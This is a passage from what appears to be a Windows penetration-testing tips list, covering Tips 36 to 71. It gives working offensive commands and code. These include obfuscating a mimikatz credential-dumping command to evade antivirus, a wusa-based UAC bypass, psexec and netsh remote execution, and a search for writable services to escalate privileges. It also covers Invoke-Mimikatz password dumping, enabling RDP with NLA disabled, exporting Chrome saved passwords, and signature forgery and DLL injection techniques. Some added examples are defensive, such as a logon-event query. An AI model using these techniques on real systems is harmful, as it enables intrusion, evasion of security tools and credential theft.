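`Get-FileHash` needs PowerShell 4.0 or later; on older hosts compute the hash with `[System.Security.Cryptography.SHA256]::Create().ComputeHash($bytes)` instead.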
---
### Tips 36 If a powershell script is flagged by anti-virus, try obfuscating it with Invoke-Obfuscation.
https://github.com/danielbohannon/Invoke-Obfuscation
Eg.
Set the code to be obfuscated:
```
set scriptblock " Invoke-111111 -Command "log privilege::debug sekurlsa::logonpasswords exit" "
```
Enter `encoding`
Enter `1` to select ASCII encoding
Obfuscated output:
```
" $(SEt-iTem 'VARIaBle:OFS' '' ) "+ [StRinG](( 73,110 , 118 ,111, 107, 101, 45, 49, 49 ,49 ,49 ,49 , 49, 32 , 45 , 67, 111, 109 , 109, 97 , 110 , 100 , 32,34,108, 111, 103 ,32, 112 ,114 , 105,118,105,108, 101, 103 ,101, 58 , 58 , 100 , 101 , 98, 117 ,103,32 , 115,101,107 ,117,114 , 108,115, 97 ,58 , 58, 108 ,111 ,103,111,110, 112, 97, 115 ,115,119, 111, 114, 100, 115, 32, 101, 120,105,116 ,34 )|FOReacH-objeCT{( [ChAR][iNT] $_) } ) +"$( Set-variAbLE 'oFS' ' ' ) "|. ( $env:PUbLic[13]+$eNv:PuBlIc[5]+'x')
```
---
### Tips 37 python script to exe
Two common methods:
- Use py2exe
- Use PyInstaller
Usage and fixes for common problems are covered in the reference.
Reference:
[《Developing custom scripts for the local password viewer LaZagne》](https://3gstudent.github.io/%E6%9C%AC%E5%9C%B0%E5%AF%86%E7%A0%81%E6%9F%A5%E7%9C%8B%E5%B7%A5%E5%85%B7LaZagne%E4%B8%AD%E7%9A%84%E8%87%AA%E5%AE%9A%E4%B9%89%E8%84%9A%E6%9C%AC%E5%BC%80%E5%8F%91)
---
### Tips 38 Write files to an administrator-only path with normal user rights
Eg.
Drop a file into the `c:\windows` folder from a non-elevated process:
```
makecab c:\test\test.exe %TMP%\1.tmp
wusa %TMP%\1.tmp /extract:"c:\windows" /quiet
```
This works because wusa.exe is an auto-elevating Windows binary, so the account still has to be a member of Administrators; it only avoids the UAC prompt.
Applicable to Win7 and Win8 (wusa.exe no longer supports `/extract` on Windows 10). Learned from:
https://github.com/EmpireProject/Empire/blob/master/data/module_source/privesc/Invoke-WScriptBypassUAC.ps1
Reference:
[《Analysis of Invoke-WScriptBypassUAC in Empire》](https://3gstudent.github.io/Empire%E4%B8%AD%E7%9A%84Invoke-WScriptBypassUAC%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90)
---
### Tips 39 Summary of methods for executing programs on remote systems
Common methods:
- at
- psexec
- WMIC
- wmiexec
- smbexec
- powershell remoting
Psexec usage:
```
psexec.exe \\test.local /accepteula -u test\admin -p test123! -s -c test.bat
```
test.bat is a local file: `-c` copies it to the remote system before running it, and `-s` runs it as SYSTEM.
New method:
- DCOM
Reference:
[《Domain penetration: executing programs on remote systems via DCOM》](https://3gstudent.github.io/%E5%9F%9F%E6%B8%97%E9%80%8F-%E5%88%A9%E7%94%A8DCOM%E5%9C%A8%E8%BF%9C%E7%A8%8B%E7%B3%BB%E7%BB%9F%E6%89%A7%E8%A1%8C%E7%A8%8B%E5%BA%8F)
---
### Tips 40 Looking for services that can be used in Windows systems
Enumerate the executable path of every Windows service. If a normal user has write permission on that path (the binary or its directory), the service can be used to escalate privileges.
powershell code (checks the owner of the directory holding each service binary; a directory not owned by SYSTEM, TrustedInstaller or Administrators is worth a closer look):
```
$ErrorActionPreference = "SilentlyContinue"
$privilegedOwners = @("NT AUTHORITY\SYSTEM", "NT SERVICE\TrustedInstaller", "BUILTIN\Administrators")
foreach ($svc in Get-WmiObject win32_service) {
    $path = $svc.PathName
    if (-not $path) { continue }
    # Recover the directory: strip surrounding quotes, then keep everything up to the last backslash
    if ($path -match '^"([^"]+)"') { $path = $Matches[1] }
    $cut = $path.LastIndexOf('\')
    if ($cut -lt 1) { continue }
    $dir = $path.Substring(0, $cut)
    $acl = Get-Acl -LiteralPath $dir
    if ($acl -and ($privilegedOwners -notcontains $acl.Owner)) {
        $svc | Select-Object Name, PathName, ProcessId, StartMode, State, Status
        Write-Host "Owner: $($acl.Owner)"
    }
}
Write-Host "[+] All done."
```
Reference:
[《Use powershell to find a writable windows service》](https://3gstudent.github.io/Use-powershell-to-find-a-writable-windows-service)
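Directory ownership is only a heuristic; what actually matters is whether the DACL grants write-class rights to an identity a normal user holds. The following function is an added example, not code from the original page or the referenced article: it inspects the ACL of each service binary and of its directory, and additionally flags unquoted paths containing spaces, which are exploitable even when the final directory is locked down. The identity list is a constructed default and should be extended with the target's own groups.

```powershell
# Added example: find service binaries/directories writable by low-privileged identities.
# Assumption: the $lowPriv list covers the groups a normal user on the target holds.
function Find-WritableServicePath {
    $lowPriv = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users',
                 'NT AUTHORITY\INTERACTIVE', "$env:USERDOMAIN\$env:USERNAME")
    $fsr = [System.Security.AccessControl.FileSystemRights]
    # Rights that let a user replace or retarget the binary; FullControl/Modify/Write all include some of these bits
    $writeMask = $fsr::WriteData -bor $fsr::AppendData -bor $fsr::Delete -bor $fsr::ChangePermissions -bor $fsr::TakeOwnership
    foreach ($svc in Get-WmiObject Win32_Service) {
        $p = $svc.PathName
        if (-not $p) { continue }
        # Recover the executable: a quoted path, else everything up to the first ".exe"
        if     ($p -match '^"([^"]+)"')  { $exe = $Matches[1] }
        elseif ($p -match '^(.*?\.exe)') { $exe = $Matches[1] }
        else                             { $exe = $p }
        $unquoted = ($p -notmatch '^"') -and ($exe -match ' ')
        foreach ($target in @($exe, (Split-Path -Parent $exe))) {
            $acl = Get-Acl -LiteralPath $target -ErrorAction SilentlyContinue
            if (-not $acl) { continue }
            foreach ($ace in $acl.Access) {
                if ($ace.AccessControlType -ne 'Allow') { continue }
                if ($lowPriv -notcontains $ace.IdentityReference.Value) { continue }
                if (([int]$ace.FileSystemRights -band [int]$writeMask) -eq 0) { continue }
                [pscustomobject]@{
                    Service                = $svc.Name
                    RunsAs                 = $svc.StartName   # LocalSystem means the replaced binary runs as SYSTEM
                    Target                 = $target
                    Identity               = $ace.IdentityReference.Value
                    Rights                 = $ace.FileSystemRights
                    UnquotedPathWithSpaces = $unquoted
                }
            }
        }
    }
}
Find-WritableServicePath | Format-Table -AutoSize
```

A hit on the binary itself means it can be swapped; a hit on the directory means it can be deleted and recreated (or, for unquoted paths, a binary can be planted earlier on the path). Check `StartMode` and whether the current user may restart the service before relying on either.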
---
### Tips 41 Use anti-virus software configuration errors to achieve self-starting and run before the anti-virus software
Windows supports Logon Scripts. They run when a user logs on and, in the startup order, before the anti-virus software; the anti-virus software therefore cannot intercept what the script does at that point (it has not started yet).
The key question is whether the anti-virus software intercepts the configuration of Logon Scripts.
Add a Logon Script that performs the desired operation; the anti-virus software will not intercept it.
**Note:**
The anti-virus software referred to above is "some" anti-virus software; this is not universal.
Reference:
[《Use Logon Scripts to maintain persistence》](https://3gstudent.github.io/Use-Logon-Scripts-to-maintain-persistence)
---
### Tips 42 Compiling c# program notes
Use Visual Studio:
The project name should match the namespace used in the code. If it does not, change it under Project -> Properties -> Assembly name; otherwise the generated dll cannot be used by the code that loads it.
Use csc.exe:
Eg.
```
using System;
using System.Diagnostics;

namespace TestDotNet
{
    public class Class1
    {
        // Static constructor: runs as soon as the type is first used after the assembly is loaded
        static Class1()
        {
            Process.Start("cmd.exe");
            Environment.Exit(0);
        }
    }
}
```
Save it as TestDotNet.cs and build it with csc.exe:
`C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /t:library TestDotNet.cs`
If it is saved as a.cs, add the /out parameter to name the output file TestDotNet.dll, so that the assembly name defaults to TestDotNet (matching the namespace in the code). Otherwise the dll loads but its code is not executed. The parameters are as follows:
`C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /t:library /out:TestDotNet.dll a.cs`
---
### Tips 43 Port problem with IPC connection
When establishing an IPC connection, if NetBIOS over TCP/IP is enabled on the target:
1. If both ports 139 and 445 are open, the client uses port 445 first.
2. If port 445 is blocked, the connection falls back to port 139.
If NetBIOS over TCP/IP is disabled on the target:
1. If port 445 is blocked, the connection fails (port 139 is not used).
---
### Tips 44 Get TrustedInstaller Permissions
Start the TrustedInstaller service, then obtain its privileges by duplicating its token (or by launching a child process under it).
Common methods:
- SelectMyParent
- Invoke-TokenManipulation.ps1
- incognito
Reference:
[《Penetration tips: token stealing and use》](https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Token%E7%AA%83%E5%8F%96%E4%B8%8E%E5%88%A9%E7%94%A8)
---
### Tips 45 3389 Remote Desktop Connection
#### 1, Query whether the system allows 3389 remote desktop connection:
`REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections`
1 means closed, 0 means open
View the port of the remote desktop connection:
`REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber`
#### 2, the method of opening 3389 Remote Desktop Connection
Method 1: cmd
```
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x00000d3d /f
```
Method 2: reg file
The content is as follows:
```
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
"PortNumber"=dword:00000d3d
```
Import the registry file:
`regedit /s a.reg`
**Note:**
A changed port (0xd3d = 3389 here) only takes effect after a restart.
**Supplement**
If Remote Desktop Services has never been configured on the system, a firewall rule allowing port 3389 must also be added the first time it is enabled:
`netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow`
If the connection fails with `An authentication error has occurred. The function requested is not supported.`, disable Network Level Authentication (the `Allow connections only from computers running Remote Desktop with Network Level Authentication (recommended)` option). This error is typically the CredSSP encryption-oracle mismatch between a patched client and an unpatched server; disabling NLA works around it, patching the server fixes it:
`REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0x00000000 /f`
#### 3, connect the remote desktop
Kali:
`rdesktop 192.168.1.1:3389`
Windows:
`mstsc.exe`
Non-server editions of Windows allow only one interactive session by default. Concretely:
- Logging in remotely with the same account as the console user switches the console to the logon screen.
- Logging in with a different account prompts the console user to allow the disconnection (accepted automatically after 30 seconds).
**Solution:**
Run `ts::multirdp` in mimikatz.exe to allow multiple users to log in remotely at the same time.
Different accounts can then log in remotely without conflict and without the prompt on the console.
Logging in with the same account as the console user still switches the console to the logon screen.
**Note:**
The patch is in memory only and is lost after a restart; run `ts::multirdp` again the next time it is needed.
Patching the file termsrv.dll makes the change permanent.
Reference:
[《Penetration tips: multi-user Remote Desktop logon on Windows》](https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Windows%E7%B3%BB%E7%BB%9F%E8%BF%9C%E7%A8%8B%E6%A1%8C%E9%9D%A2%E7%9A%84%E5%A4%9A%E7%94%A8%E6%88%B7%E7%99%BB%E5%BD%95)
---
### Tips 46 Use netsh to modify firewall rules on remote systems
The remote system must allow remote management of the Windows Firewall. Enable it with:
```
netsh advfirewall set currentprofile settings remotemanagement enable
```
Eg.
```
netsh -r 192.168.0.2 -u TEST\administrator -p domain123! advfirewall firewall add rule name="any" protocol=TCP dir=in localport=any action=allow
```
Reference:
[《Domain penetration: executing programs on remote systems via DCOM》](https://3gstudent.github.io/%E5%9F%9F%E6%B8%97%E9%80%8F-%E5%88%A9%E7%94%A8DCOM%E5%9C%A8%E8%BF%9C%E7%A8%8B%E7%B3%BB%E7%BB%9F%E6%89%A7%E8%A1%8C%E7%A8%8B%E5%BA%8F)
---
### Tips 47 Hijacking UAC
Execute arbitrary code when the UAC prompt appears: hijack the signature-verification function through the registry and insert the payload there.
Reference:
[《Authenticode signature forgery: forging PE file signatures and hijacking signature verification》](https://3gstudent.github.io/Authenticode%E7%AD%BE%E5%90%8D%E4%BC%AA%E9%80%A0-PE%E6%96%87%E4%BB%B6%E7%9A%84%E7%AD%BE%E5%90%8D%E4%BC%AA%E9%80%A0%E4%B8%8E%E7%AD%BE%E5%90%8D%E9%AA%8C%E8%AF%81%E5%8A%AB%E6%8C%81)
---
### Tips 48 Authenticode signature forgery of PE files
By modifying the registry, a PE file can be made to appear signed with a Microsoft certificate.
Reference:
[《Authenticode signature forgery: forging PE file signatures and hijacking signature verification》](https://3gstudent.github.io/Authenticode%E7%AD%BE%E5%90%8D%E4%BC%AA%E9%80%A0-PE%E6%96%87%E4%BB%B6%E7%9A%84%E7%AD%BE%E5%90%8D%E4%BC%AA%E9%80%A0%E4%B8%8E%E7%AD%BE%E5%90%8D%E9%AA%8C%E8%AF%81%E5%8A%AB%E6%8C%81)
[《Authenticode signature forgery: signature forgery targeting file types》](https://3gstudent.github.io/Authenticode%E7%AD%BE%E5%90%8D%E4%BC%AA%E9%80%A0-%E9%92%88%E5%AF%B9%E6%96%87%E4%BB%B6%E7%B1%BB%E5%9E%8B%E7%9A%84%E7%AD%BE%E5%90%8D%E4%BC%AA%E9%80%A0)
---
### Tips 49 Catalog signature forgery of PE files
Construct a long UNC file name to spoof the file name and obtain a Catalog signature match.
Reference:
[《Catalog signature forgery: long UNC file name spoofing》](https://3gstudent.github.io/Catalog%E7%AD%BE%E5%90%8D%E4%BC%AA%E9%80%A0-Long-UNC%E6%96%87%E4%BB%B6%E5%90%8D%E6%AC%BA%E9%AA%97)
---
### Tips 50 mklink
Creates symbolic links and junctions, which can be thought of as shortcuts at the file-system level.
To create c:\test\1 pointing to c:\temp:
(1) Create a symbolic link with the /D parameter:
`Mklink /D "c:\test\1" "c:\Temp"`
(2) Create a junction with the /J parameter:
`Mklink /J "c:\test\1" "c:\Temp"`
Difference:
A link created with /D shows a shortcut-style attribute in its file properties; a junction does not.
/J does not require administrator privileges.
/D requires administrator privileges (SeCreateSymbolicLinkPrivilege).
**Application scenario:**
Redirect the path into which a program drops its files.
---
### Tips 51 Passing parameters when executing powershell scripts
```
powershell -executionpolicy bypass -Command "Import-Module .\Invoke-Mimikatz.ps1;Invoke-Mimikatz -DumpCerts"
powershell -executionpolicy bypass -Command "Import-Module .\Invoke-Mimikatz.ps1;Invoke-Mimikatz -Command ""log ""privilege::debug"" ""sekurlsa::logonpasswords"""""
```
Inside the double-quoted `-Command` string, an embedded double quote is written as `""`.
---
### Tips 52 dll injection method
#### 1, APC
Reference:
[《DLL injection via APC: bypassing Sysmon monitoring》](https://3gstudent.github.io/%E9%80%9A%E8%BF%87APC%E5%AE%9E%E7%8E%B0Dll%E6%B3%A8%E5%85%A5-%E7%BB%95%E8%BF%87Sysmon%E7%9B%91%E6%8E%A7)
#### 2, process hollowing
Reference:
[《Implementation and detection of process hollowing》](https://3gstudent.github.io/%E5%82%80%E5%84%A1%E8%BF%9B%E7%A8%8B%E7%9A%84%E5%AE%9E%E7%8E%B0%E4%B8%8E%E6%A3%80%E6%B5%8B)
#### 3, Process Doppelgänging
Reference:
[《Introduction to exploiting Process Doppelganging》](https://3gstudent.github.io/Process-Doppelganging%E5%88%A9%E7%94%A8%E4%BB%8B%E7%BB%8D)
---
### Tips 53 Default shared directory in the domain
```
\\<domain>\SYSVOL\
```
Every host in the domain can read it. It holds Group Policy data, including logon script configuration files; Group Policy Preference files stored there can contain saved passwords (see the reference).
Reference:
[《Domain penetration: recovering passwords saved in Group Policy from SYSVOL》](https://3gstudent.github.io/%E5%9F%9F%E6%B8%97%E9%80%8F-%E5%88%A9%E7%94%A8SYSVOL%E8%BF%98%E5%8E%9F%E7%BB%84%E7%AD%96%E7%95%A5%E4%B8%AD%E4%BF%9D%E5%AD%98%E7%9A%84%E5%AF%86%E7%A0%81)
---
### Tips 54 Your TeamViewer may be hacked
If your TeamViewer version is `13.0.5058`, do not casually connect to an unknown TeamViewer peer: the connection can be used to attack you.
Reference:
[《Testing the privilege vulnerability in TeamViewer 13.0.5058》](https://3gstudent.github.io/TeamViewer-13.0.5058%E4%B8%AD%E7%9A%84%E6%9D%83%E9%99%90%E6%BC%8F%E6%B4%9E%E6%B5%8B%E8%AF%95)
---
### Tips 55 Remotely view domain logon and logoff related logs:
#### Method 1:
Query the Security log of the domain controller `dc1` remotely with wevtutil, filtering on event ID and a time window:
```
wevtutil qe security /rd:true /f:text /q:"*[System[(EventID=4624 or EventID=4623 or EventID=4672) and TimeCreated[@SystemTime>='2022-05-26T02:30:39' and @SystemTime<='2022-05-26T02:31:00']]]" /r:dc1 /u:administrator /p:password
```
The same filter written as path expressions:
```
wevtutil qe security /rd:true /f:text /q:"(Event/System/EventID=4624 or Event/System/EventID=4623 or Event/System/EventID=4672) and Event/System/TimeCreated/@SystemTime >= '2022-05-26T02:30:39' and Event/System/TimeCreated/@SystemTime <= '2022-05-26T02:31:00'" /r:dc1 /u:administrator /p:password
```
Each ID needs its own comparison: `EventID=4624 or 4623` does not work, because a bare number is always true in XPath and every event would match.
#### Method 2
(Not recommended: the file is large)
Copy the domain controller's `C:\Windows\System32\winevt\Logs\Security.evtx` and filter events 4624/4623/4672 offline.
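The same time-boxed query can be run with `Get-WinEvent`, which also makes it easy to pull the fields a responder actually reads (account, logon type, source address) out of the event XML. The following function is an added example, not code from the original page; it assumes the remote Event Log service is reachable (RPC, "Remote Event Log Management" firewall rule) and that the credential can read the Security log. 4624 and 4672 are the IDs from the page; 4634 (logoff) is added here for the logout side.

```powershell
# Added example: time-boxed logon/logoff query against a DC with the useful fields extracted.
# Assumption: remote Event Log access is allowed and the caller may read the Security log.
function Get-DomainLogonEvents {
    param(
        [string]$ComputerName = 'dc1',
        [datetime]$Start = (Get-Date).AddHours(-1),
        [datetime]$End = (Get-Date),
        [pscredential]$Credential
    )
    $params = @{
        ComputerName    = $ComputerName
        FilterHashtable = @{ LogName = 'Security'; Id = 4624, 4634, 4672; StartTime = $Start; EndTime = $End }
        ErrorAction     = 'SilentlyContinue'
    }
    if ($Credential) { $params['Credential'] = $Credential }
    foreach ($e in Get-WinEvent @params) {
        # EventData/Data elements carry a Name attribute; flatten them into a hashtable
        $data = @{}
        foreach ($d in ([xml]$e.ToXml()).Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
        # 4672 names the account in Subject*, 4624/4634 in Target*
        if ($e.Id -eq 4672) { $account = "$($data['SubjectDomainName'])\$($data['SubjectUserName'])" }
        else                { $account = "$($data['TargetDomainName'])\$($data['TargetUserName'])" }
        [pscustomobject]@{
            Time      = $e.TimeCreated
            Id        = $e.Id
            Account   = $account
            LogonType = $data['LogonType']   # 2 interactive, 3 network, 10 RemoteInteractive (RDP); not set on 4672
            Source    = $data['IpAddress']   # only on 4624
        }
    }
}
# Usage (the credential prompt is interactive):
# Get-DomainLogonEvents -ComputerName dc1 -Credential (Get-Credential) |
#     Where-Object { $_.Id -eq 4624 -and $_.LogonType -eq 10 } | Format-Table -AutoSize
```

On a domain controller 4624 with logon type 3 is dominated by routine Kerberos and SMB traffic; filtering on logon type 2 and 10, or on 4672 for accounts that are not expected to hold admin-equivalent privileges, narrows the result to the sessions worth examining.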
---
### Tips 56 Determine whether the current session is locked.
GetForegroundWindow() returns NULL while the lock screen is up, and a non-NULL window handle when the session is not locked.
Reference:
https://stackoverflow.com/questions/9563549/what-happens-behind-the-windows-lock-screen
Powershell POC:
https://github.com/3gstudent/Writeup/blob/master/CheckStandby.ps1
---
### Tips 57 Get the time since the current user's last input
Determine it via the Win32 API GetLastInputInfo, which reports the tick count of the last user input.
c#:https://www.codeproject.com/Articles/13384/Getting-the-user-idle-time-with-C
powershell:
https://github.com/3gstudent/Writeup/blob/master/GetIdleTime.ps1
---
### Tips 58 Determine the screen saver startup time of the current system
Determine whether a screen saver is enabled:
Look at the registry key `HKEY_CURRENT_USER\Control Panel\Desktop` for the value `SCRNSAVE.EXE`.
```
REG QUERY "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE
```
If a screen saver is enabled, read the value `ScreenSaveTimeOut` to get the idle time before it starts (in seconds).
```
REG QUERY "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveTimeOut
```
---
### Tips 59 Hide the interface of the specified process
Change window state via API ShowWindowAsync.
POC:
https://github.com/3gstudent/Writeup/blob/master/HiddenProcess.ps1
---
### Tips 60 Screen capture of Windows system via Powershell
https://gallery.technet.microsoft.com/scriptcenter/eeff544a-f690-4f6b-a586-11eea6fc5eb8/file/50729/1/Take-ScreenShot.ps1
---
### Tips 61 View the programs currently installed on Windows systems
Obtained by enumerating the registry keys HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
**Note:**
The directory of the 32-bit program under the 64-bit system is `HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall`
POC:
https://github.com/3gstudent/ListInstalledPrograms
---
### Tips 62 Get the current system type via wmi
```
wmic /NAMESPACE:"\\root\CIMV2" PATH Win32_ComputerSystem get PCSystemType /FORMAT:list
```
|Value|Meaning|
| - | - |
|0 (0x0) |Unspecified|
|1 (0x1) |Desktop|
|2 (0x2) |Mobile|
|3 (0x3) |Workstation|
|4 (0x4) |Enterprise Server|
|5 (0x5) |Small Office and Home Office (SOHO) Server|
|6 (0x6) |Appliance PC|
|7 (0x7) |Performance Server|
|8 (0x8) |Maximum|
---
### Tips 63 Export the passwords saved by the Chrome browser
#### 1, online
Method 1:
Read the database file `%LocalAppData%\Google\Chrome\User Data\Default\Login Data`. It is locked while Chrome is running, so copy it first.
On the same system, the stored blobs can be decrypted directly by calling the API CryptUnprotectData (DPAPI) in the user's context.
**Note:**
Since Chrome 80 the password fields are encrypted with AES-256-GCM; the AES key is stored DPAPI-protected in `User Data\Local State` (`os_crypt.encrypted_key`), so CryptUnprotectData is applied to that key rather than to each entry.
Method 2:
mimikatz
```
vault::cred
```
Reference:
[《Penetration tips: exporting passwords saved in the Chrome browser》](https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E5%AF%BC%E5%87%BAChrome%E6%B5%8F%E8%A7%88%E5%99%A8%E4%B8%AD%E4%BF%9D%E5%AD%98%E7%9A%84%E5%AF%86%E7%A0%81)
#### 2, offline
With the user's DPAPI master key, the saved passwords can be decrypted offline without knowing the user's plaintext password.
Reference:
[《Penetration tips: exporting passwords saved in Chrome offline using the master key》](https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E5%88%A9%E7%94%A8Masterkey%E7%A6%BB%E7%BA%BF%E5%AF%BC%E5%87%BAChrome%E6%B5%8F%E8%A7%88%E5%99%A8%E4%B8%AD%E4%BF%9D%E5%AD%98%E7%9A%84%E5%AF%86%E7%A0%81)
---
### Tips 65 Get historical copies of system files through ShadowCopy
Query whether the current system has snapshots:
```
vssadmin list shadows
```
Access the files in a snapshot (the volume number, 15 here, is taken from the `Shadow Copy Volume` line of the listing):
```
mklink /d c:\testvsc \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy15\
dir c:\testvsc
```
Reference:
[《Domain penetration: obtaining the NTDS.dit file from a domain controller》](https://3gstudent.github.io/%E5%9F%9F%E6%B8%97%E9%80%8F-%E8%8E%B7%E5%BE%97%E5%9F%9F%E6%8E%A7%E6%9C%8D%E5%8A%A1%E5%99%A8%E7%9A%84NTDS.dit%E6%96%87%E4%BB%B6)
---
### Tips 64 How to execute multiple commands on the command line
```
aa && bb
```
Execute aa; run bb only if aa succeeded.
```
aa || bb
```
Execute aa; run bb only if aa failed.
```
aa & bb
```
Execute aa and then bb, regardless of whether aa succeeded.
---
### Tips 65 Sending mail via powershell (with attachments)
Two methods, the code can refer to:
https://github.com/3gstudent/SendMail-with-Attachments
---
### Tips 66 Get the remote desktop connection history of all users by reading the registry with powershell
By default only the hive of the currently logged-on user (HKCU) is available. The hives of users who are not logged on can be read by loading their NTUSER.DAT with `reg load` and unloading it afterwards with `reg unload`.
The code can refer to:
https://github.com/3gstudent/ListInstalledPrograms
Reference:
[《Penetration tips: obtaining the Remote Desktop connection history of a Windows system》](https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E8%8E%B7%E5%BE%97Windows%E7%B3%BB%E7%BB%9F%E7%9A%84%E8%BF%9C%E7%A8%8B%E6%A1%8C%E9%9D%A2%E8%BF%9E%E6%8E%A5%E5%8E%86%E5%8F%B2%E8%AE%B0%E5%BD%95)
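The following function is an added example, not code from the original page or the linked repository. It walks the profile list, loads each user's NTUSER.DAT under HKEY_USERS with `reg load` (hives of users who are currently logged on are already mounted and are read in place), reads the `Terminal Server Client` keys, and unloads the hive again. It needs administrator rights.

```powershell
# Added example: RDP client history for every local profile via reg load / reg unload.
# Assumption: run elevated; profiles under ProfileList with an S-1-5-21-* SID are real user profiles.
function Get-RdpHistoryAllUsers {
    $profiles = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\*' |
                Where-Object { $_.PSChildName -like 'S-1-5-21-*' }   # skips SYSTEM/service profiles
    foreach ($p in $profiles) {
        $sid  = $p.PSChildName
        $hive = Join-Path $p.ProfileImagePath 'NTUSER.DAT'
        $alreadyLoaded = Test-Path "Registry::HKEY_USERS\$sid"
        if (-not $alreadyLoaded) {
            if (-not (Test-Path -LiteralPath $hive)) { continue }
            reg load "HKU\$sid" $hive 2>$null | Out-Null
            if ($LASTEXITCODE -ne 0) { continue }
        }
        try {
            $base = "Registry::HKEY_USERS\$sid\Software\Microsoft\Terminal Server Client"
            # Default\MRU0..MRU9 hold the most recently used targets
            $mru = Get-ItemProperty -Path "$base\Default" -ErrorAction SilentlyContinue
            if ($mru) {
                foreach ($prop in ($mru.PSObject.Properties | Where-Object { $_.Name -like 'MRU*' })) {
                    [pscustomobject]@{ Sid = $sid; Profile = $p.ProfileImagePath; Kind = $prop.Name
                                       Server = $prop.Value; UsernameHint = $null }
                }
            }
            # Servers\<host>\UsernameHint records the last account used for that host
            foreach ($srv in (Get-ChildItem -Path "$base\Servers" -ErrorAction SilentlyContinue)) {
                $hint = (Get-ItemProperty -Path $srv.PSPath -ErrorAction SilentlyContinue).UsernameHint
                [pscustomobject]@{ Sid = $sid; Profile = $p.ProfileImagePath; Kind = 'Server'
                                   Server = $srv.PSChildName; UsernameHint = $hint }
            }
        }
        finally {
            if (-not $alreadyLoaded) {
                # The registry provider keeps handles open; release them or reg unload reports access denied
                [gc]::Collect()
                reg unload "HKU\$sid" 2>$null | Out-Null
            }
        }
    }
}
Get-RdpHistoryAllUsers | Format-Table -AutoSize
```

Always unload in a `finally` block: a hive left mounted under HKEY_USERS keeps NTUSER.DAT locked and the user cannot log on with their normal profile until it is released.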
---
### Tips 67 Use pscp to upload files from Windows to Linux via the command line
download link:
https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html
The upload command is as follows:
```
pscp.exe -l root -pw toor -r c:\1\putty.exe 192.168.62.131:/root/
```
On the first connection it asks whether to cache the server's host key.
Enter `Y`: the key is stored under the registry key `HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\SshHostKeys` and the question is not asked again on later connections.
Enter `N`: nothing is written to the registry.
To answer `N` automatically:
```
echo n |pscp.exe -l root -pw toor -r c:\1\putty.exe 192.168.62.131:/root/
```
---
### Tips 68 Enumeration of Windows System Handles
- On Windows 8 and later, NtQueryInformationProcess with ProcessHandleInformation is the most efficient method.
- On Windows XP and later, NtQuerySystemInformation with SystemExtendedHandleInformation.
- On Windows 7 and later, NtQuerySystemInformation with SystemHandleInformation can be used.
Note:
- WinXP and Win7, ObjectTypeNumber = 0x1c
- Win8 and later, ObjectTypeNumber = 0x1e
Object type indexes are undocumented and change between versions; resolve the index at runtime (NtQueryObject with ObjectTypeInformation) rather than hardcoding it.
---
### Tips 69 Use rar.exe to compress files
https://github.com/3gstudent/test/raw/master/rar.exe
Maximum compression, password-protected:
```
rar.exe a -m5 1.rar 1.txt -p123456
```
Split into volumes of 10MB each:
```
rar.exe a -m5 -v10m 1.rar 1.txt -p123456
```
Decompression:
```
rar.exe e 1.rar -p123456
```
**Note:**
`-p` encrypts file contents only; file names remain visible in the archive listing. Use `-hp123456` to encrypt the headers as well.
---
### Tips 70 Use the command tasklist /v to list processes
The /v parameter shows detailed information, which is helpful for collecting information.
---
### Tips 71 Remove the first character of a string in C
```
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <wchar.h>

WCHAR srcString[20] = L"I love you!";
WCHAR targetString[20];
/* The size argument is the destination buffer size; wcslen() of an uninitialised
   buffer is undefined behaviour. _TRUNCATE copies what fits and always NUL-terminates. */
wcsncpy_s(targetString, _countof(targetString), srcString + 1, _TRUNCATE);
wprintf_s(L"%s\n", targetString);
```
---